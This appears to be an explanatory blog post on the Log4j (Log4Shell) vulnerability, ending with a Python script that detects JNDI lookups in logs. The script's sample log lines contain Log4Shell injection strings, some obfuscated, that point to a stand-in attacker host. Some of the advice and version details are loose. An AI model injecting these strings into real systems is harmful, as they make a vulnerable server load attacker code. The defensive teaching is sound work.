Log4jshell


Biggest threat to infosec in the past decade...

The Log4j security breach, also referred to as Log4jshell, concerns Log4j, a logging library created by the Apache Software Foundation. Log4j is a widely used Java-based open-source library that software developers rely on in software from Minecraft, Amazon, Apple, Twitter and many more. It is used to monitor and track applications, which means it is deployed on millions of devices and servers all over the world.


What is LOG4J Vulnerability

The Log4j vulnerability, or Log4jshell, is one of the biggest security vulnerabilities we have seen over the past 10 years (2012-2022), according to CISA Director Jen Easterly.

Log4j itself is not a virus; it is a simple data logging tool used in a lot of software. A flaw in the Log4j code allowed hackers to exploit it and gain an open door into the network. Because this open-source library is used all over the world on a great many servers, it is a major cause for concern for end users and organizations. The effect of this vulnerability has cut across all sectors: government, organizations and even individuals. Unlike most vulnerabilities, which are specific to one system, Log4j affects Windows, Linux, Apple and iOS users alike.

Attack Technique


According to CrowdStrike, 84% fear this will be the biggest threat in the next three years.

This vulnerability was discovered on November 24, 2021 but was not published immediately. On December 10, 2021, the Apache Software Foundation publicly announced the vulnerability in Log4j, and that is when attacks began to ramp up. Log4j v2.15 has a weakness in its configuration that allows an attacker to take advantage of whatever application or website Log4j is used on. The vulnerability was given a severity score of 10 and classified as a remote code execution vulnerability. When a message is stored by Log4j, it can reach out to an outside destination or server run by a hacker; the hacker then uses that connection to pass arbitrary commands back to the server and carry out malicious activities. Log4j allows lookups to appear in log messages: whenever user input is logged, and that input contains a JNDI lookup pointing to a malicious threat actor's endpoint, Log4j still resolves the lookup. It connects to the malicious server and downloads Java code from it, and that code is then executed. The attack is therefore carried out through remote code execution. It is a highly dangerous exploit precisely because it does not require great technical knowledge: script kiddies and even curious users can execute it, yet the severity level is very high.

Impact of the attack

The security vulnerability in Log4j grants hackers the ability to bypass any form of restriction and gain unauthorized access to systems and resources without any password. Once a hacker gets into the system, they can carry out malicious activities such as installing spy software and stealing information and sensitive data: customer data, passwords, intellectual property and corporate strategies. Once attackers are logged into the system they can deploy ransomware, and nation-states use it to target corporations. The vulnerability can also become a supply-chain problem, letting the people you do business with be used as a path into your environment. Attackers are infiltrating companies, installing crypto miners and increasing their privileged access.

Countermeasures against log4j vulnerability

There isn't a lot you can do to prevent this exploit from affecting you or your organization, because much of the software in use runs with the Log4j library, but here are a few steps to protect yourself:

  • If a program notifies you of an update, make sure you install it, because it might be a security fix for Log4j or other vulnerabilities.

  • Always remember to change your password frequently.

  • Use two-factor authentication.

  • Use a VPN.

  • Update and patch Apache Log4j and Java to the most recent versions to get rid of the security risk.

  • Turn LDAP off: LDAP is the mechanism used to reference the outside server through which attackers pass commands.
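As an added defensive example (not code from the original post), the following Python script scans web-server log lines for the JNDI lookup strings described in the Attack Technique section, so a defender can find which logged user input would have triggered a lookup before the patches above were applied. It also collapses lookups split up with Log4j's `${lower:...}` / `${upper:...}` syntax, which plain string matching misses. The log lines, IP addresses and the `attacker.example` hostname are constructed placeholders.

```python
import re

# Constructed web-server access-log lines for this example (not real traffic).
# Lines 2-4 carry a JNDI lookup in the User-Agent field; lines 1 and 5 are benign
# (line 5 contains a harmless, non-JNDI Log4j lookup that must not be flagged).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:02:19 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [10/Dec/2021:14:03:40 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:J}ndi:${lower:RMI}://attacker.example/b}"
203.0.113.12 - - [10/Dec/2021:14:04:02 +0000] "GET /api HTTP/1.1" 200 40 "-" "${jNdI:dns://attacker.example/c}"
203.0.113.14 - - [10/Dec/2021:14:05:00 +0000] "GET /docs HTTP/1.1" 200 40 "-" "${date:yyyy-MM-dd}"
"""

# An innermost ${...} lookup: one that contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The JNDI lookup itself, with the protocol handlers Log4j's JNDI lookup accepts.
JNDI_PATTERN = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nis|nds)://[^}\s\"]+", re.IGNORECASE)

def _resolve_inner(m):
    """Evaluate the case-changing lookups; leave anything else untouched."""
    body = m.group(1)
    if body.lower().startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.lower().startswith("upper:"):
        return body[len("upper:"):].upper()
    return m.group(0)

def normalize(text, max_rounds=10):
    """Collapse nested lookups so a split-up 'jndi:' string reveals its final form."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve_inner, text)
        if resolved == text:
            break
        text = resolved
    return text

def scan_log(log_text):
    """Return (line_no, lookup) for every line carrying a JNDI lookup."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        match = JNDI_PATTERN.search(normalize(line))
        if match:
            hits.append((line_no, match.group(0)))
    return hits

if __name__ == "__main__":
    for line_no, lookup in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: JNDI lookup logged -> {lookup}")
```

Every hit is a request whose logged user input would have been resolved by a vulnerable Log4j, so the hosts that logged those lines are the ones to check first for follow-on activity.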

REFERENCE

Apache

en.wikipedia.org/wiki/Log4j

ncsc.gov.uk/information/log4j-vulnerability..

venturebeat.com/2022/03/08/mandiant-reminds..